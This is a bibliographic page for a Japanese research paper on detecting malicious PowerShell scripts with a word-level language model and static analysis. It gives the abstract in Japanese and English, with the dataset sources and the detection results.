単語レベルの言語モデルを用いた悪性PowerShellの検出

田尻, 裕貴, 三村, 守

サイバー攻撃において，攻撃対象の端末にインストールされている正規のツールを利用する傾向が強まっている．特に攻撃ツールとして，Microsoft社が提供するPowerShellを悪用するケースが年々増加しており問題となっている．先行研究では，文字ベースのディープラーニングを用いた悪性 PowerShell コマンドを検知する手法が提案された．提案された手法は，伝統的な自然言語処理および文字レベルでの畳み込みニューラルネットワークを組み合わせた手法である．この手法では，前処理に動的解析を用いており，解析に時間を要する．そこで本研究では，静的解析のみを用い，単語ベースの言語モデルによって悪性および良性のサンプルから特徴ベクトルを作成し，未知のサンプルを分類する手法を提案する．データセットは，HybridAnalysis から入手した良性および悪性のサンプル，および github から入手した良性サンプルから作成した．検証実験では，F 値は 0.82 となった．また，未知の悪性サンプルを約 5 割検知できることを確認した．

There is a growing tendency for cybercriminals to abuse legitimate tools installed on the target computers for cyberattacks. In particular, the use of PowerShell provided by Microsoft has been increasing every year and has become a problem. In previous studies, a method to detect malicious PowerShell commands using character-based deep learning was proposed. The proposed method combines traditional natural language processing and character-level convolutional neural network. This method, however, requires dynamic analysis for preprocessing, and thereby requires time. This paper proposes a method to classify unknown PowerShell by using only static analysis. Our method uses feature vectors extracted from malicious and benign PowerShell scripts using a word-based language model for classification. Datasets were generated from benign and malicious PowerShell scripts obtained from HybridAnalysis, and benign PowerShell scripts obtained from github. Our experiment shows that the F-measure achieves more than 0.82.Furthermore, we confirmed that almost 50% of unknown malicious PowerShell script could be detected.

単語レベルの言語モデルを用いた悪性PowerShellの検出

Bibliographic Information

Abstract

Journal

Keywords

Details 詳細情報について

Export

Report a problem